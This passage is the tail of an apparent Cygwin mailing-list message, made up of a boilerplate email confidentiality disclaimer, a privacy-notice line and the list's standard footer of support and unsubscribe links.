be subject to copyright or other intellectual property protection. If you are not the intended recipient, you are not authorized to use or disclose this information, and we request that you notify us by reply mail or telephone and delete the original message from your mail system. > > For details about what personal information we collect and why, please see our Privacy Notice on our website at: Read privacy policy > -- Problem reports: https://cygwin.com/problems.html FAQ: https://cygwin.com/faq/ Documentation: https://cygwin.com/docs.html Unsubscribe info: https://cygwin.com/ml/#unsubscribe-simple